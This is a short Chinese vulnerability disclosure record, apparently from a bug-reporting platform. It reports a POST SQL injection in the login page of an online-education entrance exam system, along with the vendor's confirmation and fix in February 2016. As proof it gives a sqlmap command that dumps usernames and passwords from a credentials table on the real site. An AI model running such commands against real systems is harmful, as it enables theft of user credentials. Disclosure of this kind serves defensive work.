漏洞概要
关注数(24)
关注此漏洞
漏洞标题:奥鹏教育某机考系统存在SQL注入漏洞
提交时间:2016-02-17 09:16
修复时间:2016-02-18 13:56
公开时间:2016-02-18 13:56
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经修复
Tags标签:
无
漏洞详情
披露状态:
2016-02-17: 细节已通知厂商并且等待厂商处理中
2016-02-17: 厂商已经确认,细节仅向厂商公开
2016-02-18: 厂商已经修复漏洞并主动公开,细节向公众公开
简要描述:
.....
详细说明:
http://exam.open.com.cn/matriculationonline/login.asp 奥鹏教育远程教育中心--入学测试现考系统
登录处抓包:
存在POST注入....
漏洞证明:
直接脱库看看
(sqlmap.py -r 1.txt -D WSD -T PUB_PASSWORD -C USERNAME,PASSWORD --dump --threads=10 --start=1 --stop=1000)
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2016-02-17 10:28
厂商回复:
已提交相关人员处理。-liu
最新状态:
2016-02-18:漏洞已修复。请帮助检查,感谢!